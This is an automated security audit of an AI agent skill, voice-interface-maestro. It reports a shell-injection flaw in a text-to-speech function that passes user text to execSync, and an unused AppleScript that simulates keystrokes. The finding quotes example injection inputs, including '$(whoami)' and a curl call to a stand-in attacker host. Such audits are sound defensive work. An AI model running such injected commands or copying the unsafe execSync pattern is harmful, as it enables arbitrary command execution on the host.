Skills
skills/famaoai-creator/gemini-skills/voice-interface-maestro/Gen Agent Trust Hub

voice-interface-maestro

Fail

Audited by Gen Agent Trust Hub on Mar 6, 2026

Risk Level: HIGHCOMMAND_EXECUTION
Full Analysis
  • [COMMAND_EXECUTION]: The speakText function in src/lib.ts uses child_process.execSync to invoke the macOS say command with user-provided text. The sanitization logic in cleanTextForSpeech and the escaping mechanism in speakText are insufficient to prevent shell injection. Specifically, while it removes backticks and escapes double quotes, it fails to sanitize other shell metacharacters such as $(), ;, &, and |. An attacker providing input like $(whoami) or ; curl http://attacker.com/ could execute arbitrary commands in the context of the agent process.
  • [COMMAND_EXECUTION]: The skill includes an unreferenced AppleScript file at applescript/toggle_dictation.scpt that utilizes System Events to simulate keyboard input (key code). This capability, if exploited or activated, allows for unauthorized UI interaction and potentially bypassing security prompts on macOS.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Mar 6, 2026, 11:28 AM